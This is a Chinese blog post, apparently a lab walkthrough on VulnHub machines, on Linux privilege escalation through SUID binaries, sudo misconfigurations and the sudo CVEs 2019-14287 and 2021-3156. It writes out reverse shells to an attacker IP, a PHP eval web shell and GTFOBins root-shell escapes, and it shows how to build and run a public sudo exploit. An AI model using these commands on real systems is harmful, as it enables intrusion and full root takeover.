Linux权限提升二

#应用场景:

获取到Web权限或普通用户在Linux服务器上时进行的SUID&SUDO提权

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。

#利用参考:

https://gtfobins.github.io/

#Linux系统提权-Web&用户-Suid

1、SUID&GUID

环境:https://www.vulnhub.com/entry/dc-1,292/

命令:SUID GUID

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

项目:LinEnum PEASS-ng

/usr/bin/find . -exec '/bin/sh' \;

2、SUID&SUDO

环境:https://www.vulnhub.com/entry/toppo-1,245/

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

SUID:

/usr/bin/python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.139.141",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#Linux系统提权-Web&用户-Sudo(cve)

1、SUDO

环境:https://www.vulnhub.com/entry/toppo-1,245/

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

SUDO:

cat /etc/sudoers

/usr/bin/awk 'BEGIN {system("/bin/sh")}'

2、SUDO-CVE

环境:https://www.vulnhub.com/entry/devguru-1,620/

-信息收集:

80,8585

http://192.168.139.150/.git/

http://192.168.139.150/adminer.php

http://192.168.139.150/backend/backend/auth

http://192.168.139.150:8585/

http://192.168.139.150:8585/admin

-git泄漏(利用点)

python GitHack.py http://192.168.139.150/.git/

-访问管理(Web入口):

adminer.php 添加用户名密码 登录后台 模版 写入Shell

function onStart(){

//蚁剑连接

eval($_POST["pass"]);

}

-找备份寻突破(升权):

/var/backup/app.ini.bak 修改用户密码 登录后台 写入反弹

bash -c "exec bash -i >& /dev/tcp/192.168.139.141/5555 0>&1"

-利用sudo提权(cve):

sudo -l

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)

gitea数据库配置备份文件泄露 => 连接gitea数据库,找到gitea的用户密码 => 登入gitea,写shell(更高权限) => 提权。

3、SUDO-CVE

环境:kali2020

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

-判断:sudoedit -s / 报错存在

-利用:

git clone https://github.com/blasty/CVE-2021-3156.git

cd CVE-2021-3156

make

chmod a+x sudo-hax-me-a-sandwich

./sudo-hax-me-a-sandwich 0

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值